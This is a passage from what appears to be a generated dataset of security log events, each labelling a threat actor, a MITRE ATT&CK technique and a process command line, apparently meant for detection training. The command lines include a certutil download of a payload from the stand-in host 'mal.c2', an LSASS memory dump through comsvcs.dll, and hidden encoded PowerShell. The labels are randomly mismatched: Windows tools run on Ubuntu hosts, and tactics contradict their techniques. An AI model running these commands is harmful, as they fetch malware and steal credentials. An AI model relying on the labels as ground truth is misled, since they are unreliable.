beacon.dll","name":"wmic.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-06-27T12:25:56.000Z","user":{"name":"azuread\\np3stv27dw28","sid":"S-1-5-21-321331373-196187618-9702"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Privilege Escalation","Exfiltration"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20250126T051145000Z_0005743","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.54.172.210","name":"APP-WEB-MKLH0XW6SP","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5743FIN7T1021.006"},"network":{"domain":"github.com","dst_ip":"1.117.126.195","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-09-06T04:43:43.000Z","user":{"name":"azuread\\j3jdql5892l9","sid":"S-1-5-21-979189280-276991090-7654"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Initial Access","Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_mustangpanda_20250428T014719000Z_0005745","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.26.40.200","name":"APP-WEB-ATMCSR7WE9","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5745Mustang PandaT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.131.102.146","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2953 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-08T06:15:04.000Z","user":{"name":"i-yt2yxussiqcn","sid":"S-1-5-21-764341138-604823212-2399"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using encrypted C2 technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Lateral Movement","Discovery"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20261110T135500000Z_0005747","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["WMI","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.92.251.38","name":"APP-WEB-988WJYZROM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5747FIN7T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.27.107.136","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-27T11:23:28.000Z","user":{"name":"i-s4s6u1wyefa0","sid":"S-1-5-21-684106034-692880098-8453"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Exfiltration"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20250622T212615000Z_0005749","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.146.209.11","name":"AZURE-VM-SIHC0H4WXV","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5749APT41T1546.003"},"network":{"domain":"github.com","dst_ip":"1.65.81.74","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-07-22T22:54:48.000Z","user":{"name":"azuread\\no0hxhk21s8k","sid":"S-1-5-21-955657729-480245494-9459"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20250221T032734000Z_0005751","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.25.233.214","name":"DB-ORACLE-T9OD3NE754","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5751APT41T1546.003"},"network":{"domain":"update.microsoft.com","dst_ip":"1.106.160.142","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-10-27T00:39:37.000Z","user":{"name":"CORP\\fwklji9oe9b4","sid":"S-1-5-21-211936568-902263555-3626"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Credential Access","Lateral Movement"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20251204T185840000Z_0005753","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.181.32.149","name":"APP-WEB-D6QPX9SIHO","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5753Volt TyphoonT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.51.7.8","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3861 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-03-25T14:44:11.000Z","user":{"name":"arn:aws:iam::7sacrj47jdr1","sid":"S-1-5-21-852195436-704159017-5490"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access"],"technique_id":"T1546.003"},"event_id":"evt_lapsus_20250609T234924000Z_0005755","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["LOLBin","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.198.81.141","name":"APP-WEB-TJS02Z0YRV","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5755Lapsus$T1546.003"},"network":{"domain":"aws.amazon.com","dst_ip":"1.105.48.246","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-03T18:48:22.000Z","user":{"name":"CORP\\nqfw0c4t3l67","sid":"S-1-5-21-592950147-207683998-9214"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Reconnaissance","Privilege Escalation"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260801T134158000Z_0005757","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.112.45.188","name":"IAM-ROLE-DAFR1YQSLI","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5757APT29T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.60.63.39","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2715 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-08-16T20:54:48.000Z","user":{"name":"arn:aws:iam::n1covw9qstj2","sid":"S-1-5-21-678780857-323123323-5675"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using fileless technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Lateral Movement","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20250802T044400000Z_0005759","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.145.200.128","name":"WIN-FIN-SRV-O6IJ0PN3BF","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5759FIN7T1484.001"},"network":{"domain":"github.com","dst_ip":"1.135.102.127","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-09T11:24:47.000Z","user":{"name":"azuread\\d1z7fdhsyms0","sid":"S-1-5-21-446738714-599291088-8522"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Persistence","Execution","Initial Access"],"technique_id":"T1059.001"},"event_id":"evt_apt41_20250427T043239000Z_0005761","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.23.219.208","name":"APP-WEB-6GFWIYW9DX","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5761APT41T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.5.136.6","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-01-31T17:42:34.000Z","user":{"name":"azuread\\axwe11mswwvv","sid":"S-1-5-21-540379636-416867445-3931"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20260713T132112000Z_0005763","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.33.140.32","name":"IAM-ROLE-SGC58JU22G","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5763Mustang PandaT1566.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.138.146.45","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1152 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-12-08T05:01:28.000Z","user":{"name":"i-41nbjyq7xxr3","sid":"S-1-5-21-286672233-930156584-9361"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20261228T204509000Z_0005765","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.25.77.43","name":"DB-ORACLE-Y9DJOR0FZY","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5765Mustang PandaT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.1.134.50","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2243 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2026-03-24T09:43:00.000Z","user":{"name":"i-xx9e3rg2ve8k","sid":"S-1-5-21-228871766-947286078-3531"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Discovery","Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_scatteredspider_20251116T014608000Z_0005767","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.227.99.125","name":"WIN-FIN-SRV-TB20QIM3DQ","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5767Scattered SpiderT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.106.90.119","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-09-29T07:22:10.000Z","user":{"name":"svc_cqrq9qvjb4sz","sid":"S-1-5-21-751713342-298244823-8650"}}
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion"],"technique_id":"T1531"},"event_id":"evt_lapsus_20251129T081648000Z_0005769","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.254.3.195","name":"WIN-FIN-SRV-BSWC9IURAN","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5769Lapsus$T1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.76.40.88","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-04-25T21:19:17.000Z","user":{"name":"CORP\\wiub0g37yivf","sid":"S-1-5-21-530261718-855192132-8600"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Privilege Escalation","Lateral Movement","Collection"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20250712T072821000Z_0005771","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.136.55.133","name":"WIN-FIN-SRV-LHOGHCXD37","os":"Amazon Linux 2"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5771Scattered SpiderT1059.001"},"network":{"domain":"github.com","dst_ip":"1.0.32.175","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-09-23T19:18:25.000Z","user":{"name":"azuread\\3hfamxps37kt","sid":"S-1-5-21-671960630-986817889-5197"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using fileless technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20260405T171715000Z_0005773","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.121.159.29","name":"WIN-FIN-SRV-DJ8UPWY3UP","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5773Scattered SpiderT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.129.73.237","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3521 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-02-02T10:18:31.000Z","user":{"name":"svc_envhkkdm7szw","sid":"S-1-5-21-321159088-333265795-7384"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Execution","Persistence"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20260408T235124000Z_0005775","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.226.112.68","name":"WIN-FIN-SRV-MTPPACM3GM","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5775Volt TyphoonT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.187.188.82","dst_port":445,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1456 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-07-14T00:09:17.000Z","user":{"name":"CORP\\4yd3q3h81rp2","sid":"S-1-5-21-658910218-387927475-9480"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Execution","Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_mustangpanda_20260221T154717000Z_0005777","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.136.237.24","name":"IAM-ROLE-CIPUAHBETD","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5777Mustang PandaT1531"},"network":{"domain":"cdn-content.com","dst_ip":"1.164.107.214","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-01-19T02:13:14.000Z","user":{"name":"svc_78vte8p2acey","sid":"S-1-5-21-199058962-932713544-3022"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Privilege Escalation","Exfiltration"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250608T090914000Z_0005779","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.18.237.34","name":"IAM-ROLE-Z1CET882I9","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5779Mustang PandaT1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.53.115.79","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-12-12T21:15:27.000Z","user":{"name":"arn:aws:iam::wc9jtff97gyq","sid":"S-1-5-21-540790760-113294133-7812"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Impact","Execution"],"technique_id":"T1484.001"},"event_id":"evt_fin7_20250905T042823000Z_0005781","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.155.190.201","name":"EC2-INST-VUTAKHNJLJ","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5781FIN7T1484.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.104.97.154","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-11-30T14:38:22.000Z","user":{"name":"CORP\\6zbctwnovyr5","sid":"S-1-5-21-766735413-366092500-1092"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1021.006 using encrypted C2 technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration","Impact","Execution"],"technique_id":"T1021.006"},"event_id":"evt_fin7_20250223T124837000Z_0005783","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.227.34.140","name":"IAM-ROLE-MG1RCWV9UL","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5783FIN7T1021.006"},"network":{"domain":"update.microsoft.com","dst_ip":"1.107.178.21","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-02-07T19:14:48.000Z","user":{"name":"azuread\\u45p3n1cigi3","sid":"S-1-5-21-749190003-135172907-3579"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Exfiltration"],"technique_id":"T1071.001"},"event_id":"evt_scatteredspider_20250828T201629000Z_0005785","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.233.242.191","name":"EC2-INST-ESATCZ46MC","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5785Scattered SpiderT1071.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.39.153.250","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-12-21T06:00:17.000Z","user":{"name":"CORP\\oy0x3b6drgdj","sid":"S-1-5-21-602387915-695268383-4102"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Reconnaissance","Persistence"],"technique_id":"T1059.001"},"event_id":"evt_scatteredspider_20250728T183817000Z_0005787","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.223.217.195","name":"AZURE-VM-7DTAHAIBJF","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5787Scattered SpiderT1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.111.10.9","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"services.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-09-05T15:24:09.000Z","user":{"name":"svc_f0vdiglsw2nf","sid":"S-1-5-21-916146456-645500748-3132"}}
